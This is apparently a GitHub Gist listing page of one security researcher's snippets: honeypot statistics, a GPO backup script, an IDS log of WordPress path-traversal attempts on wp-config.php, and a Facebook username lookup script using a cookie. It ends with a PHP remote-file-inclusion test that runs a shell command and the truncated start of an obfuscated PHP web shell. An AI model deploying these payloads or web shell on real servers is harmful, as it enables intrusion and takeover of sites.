felmoltor
/ Honeypot Statistics
Created
April 2, 2016 15:39
Honeypot - Top scanners,countries and user/passwords used
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ==================== | |
| = Top 15 source IP = | |
| ==================== | |
| 103.41.124.12:6480 (Hong Kong) | |
| 103.41.124.53:6363 (Hong Kong) | |
| 103.41.124.19:5809 (Hong Kong) | |
| 112.171.173.137:1691 (Korea, Republic of) | |
| 222.186.21.82:1596 (China) | |
| 117.27.249.4:1470 (China) | |
| 222.186.56.171:1302 (China) |
felmoltor
/ Backup-GPOs.ps1
Created
October 6, 2015 09:28
Powershell script to backup a domain gpo list
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Date: 10-2015 | |
| # Author: Felipe Molina (@felmoltor) | |
| # Summary: Authomatize the backup proccess of GPO for a domain. | |
| # Create a folder with the time when this script was executed and inside it a folder for each GPO of the domain | |
| # The program needs two mandatory parameters: | |
| # * Domain: The domain from where we want to backup the GPOs | |
| # * backuppath: The path to the folder where we want to store this backups | |
| param( | |
| [Parameter(Mandatory=$True,Position=1)][String]$domain, |
felmoltor
/ wordpress.scan.detected.txt
Created
August 4, 2015 07:30
[IDS] Detected wordpress vulnerability scans
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 03/12/2015 37.187.238.74 403 /$wp-content$/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download | |
| 03/12/2015 37.187.238.74 403 /$wp-content$/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download | |
| 03/12/2015 37.187.238.74 403 /$wp-content$/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download | |
| 03/12/2015 37.187.238.74 403 /$wp-content$/themes/parallelus-mingle/framework/utilities/download/getfile.php?file=../../../../../../wp-config.php | |
| 03/12/2015 37.187.238.74 403 /$wp-content$/themes/parallelus-mingle/framework/utilities/download/getfile.php?file=../../../../../../wp-config.php | |
| 03/12/2015 37.187.238.74 403 /$wp-content$/themes/parallelus-mingle/framework/utilities/download/getfile.php?file=../../../../../../wp-config.php | |
| 03/12/2015 37.187.238.74 403 /$wp-content$/themes/parallelus-salutation/framework/utilities/download/getfile.php?file=../../../../../../wp-config.php | |
| 03/12/2015 37.187.238.74 403 /$ |
felmoltor
/ find.facebook.usernames.sh
Created
June 1, 2015 18:38
AFF nicks find in facebook and twitter
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| if [[ $1 == "" ]];then | |
| echo "Provide a file with the usernames" | |
| exit | |
| fi | |
| if [[ $2 == "" ]];then | |
| echo "Provide a file with the facebook cookie" | |
| exit |
We can make this file beautiful and searchable if this error is corrected: No commas found in this CSV file in line 0.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Abengoa;abengoa.com | |
| Abertis;abertis.com | |
| Acciona;acciona.com | |
| ACS;grupoacs.com | |
| Amadeus;amadeus.com | |
| ArcelorMittal;arcelormittal.com | |
| Banco Popular;bancopopular.es | |
| Banco Sabadell;bancsabadell.com | |
| Banco Santander;bancosantander.es | |
| Bankia;bankia.com |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 1549773 yahoo.com | |
| 1261928 hotmail.com | |
| 881650 gmail.com | |
| 228439 aol.com | |
| 91586 live.com | |
| 57248 breakthru.com | |
| 49750 msn.com | |
| 45566 comcast.net | |
| 45228 ymail.com | |
| 34887 hotmail.fr |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| import os,sys | |
| if len(sys.argv) < 3: | |
| print "Usage: %s <source file> <percentage>" % sys.argv[0] | |
| exit(1) | |
| if not os.path.exists(sys.argv[1]): | |
| print "Provide a file from wich to extract the sample" |
felmoltor
/ close.firewall.sh
Last active
August 29, 2015 14:21
Open Dev environment to SSH authenticated user
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Close the remaining firewall rules opened for users that no longer are connected by SSH | |
| # It deletes the iptables rules execpt the ssh (port 22) and all the local connections | |
| # Save this script and execute it as root with a crontab every 5 minutes. | |
| # Example output of iptables -L -n: | |
| # ACCEPT tcp -- 11.22.33.44 0.0.0.0/0 tcp dpt:80 | |
| # ACCEPT tcp -- 11.22.33.44 0.0.0.0/0 tcp dpt:443 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| // echo "Testing RFI success!"; | |
| $e = ''; | |
| exec("touch ./bbbbbbbb.txt",$e); | |
| ?> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| $language = 'eng'; | |
| $auth = 0; | |
| $name = ''; // md5 Login | |
| $pass = ''; // md5 Password | |
| /**************************************************************************************************************************************************************/ | |
| error_reporting(0); | |
| $rhs = '7b17e9pVsjj89+Rs8h0UHZ8BJhgjLr4Gj++OnfgS3+I4yW4FEqAYECOBejKb97O/SNXdResK2M7u7P7GuxOgu7q6urqquvpNpuPYQd0xB7YztPrteTG39vLFhtW3IM0d2o6ZSF29ctZ7tm6q0Tx7YPbrDd01DctERorWrX6zO4LPVmPmg9lZADIsSmJnzW141GIOLbvvxsDo3a59Xx853W0LVvMhXGaYzZjU2K7dzuSPL9+/D3NPZZ0A3FmeuDA30IcdpabM1c9qz65pzz50aUG2L49pjy/qdCcnF5mvhcxPpoDlHgrDh24Gi0uDQIGz3aOTi9365s7OTObrmrKwYA0AqOHY967pBCDfXlyc1i/hSn1mH3dg0BwQikCLT4g/XO6eX9Qvzw4YKAAAmKGPAczQh3M243FlmAFWkKE3h2qE4PTk/OJmptkzSzH9aXXdTFDdBZim3R+a/SGAqS9fvHyxo49/+XJImSMEB6f0Hcnfb1HRYo/AWKdYCVHGe90dKttpr6f3DVnEyl++qP+MPxWZDswHoqnDs9R2bEh/Wl3fumos4AVP5BXRQMp1aXqXcuBCq5XNvtoQggVPdblQN5tO2XWbw1kup/zzn1dpg//Oc3Gxz+SUSjWF5CkEFSv9Emvu5Ys/lTkZFzRQW0Z+KHPXNZV1XhHygNqF3/7SfwsvXxhzy+qjXg9odDi0baaa3wCW9KymcOPPeQ65DndK7+l6q0z/cH |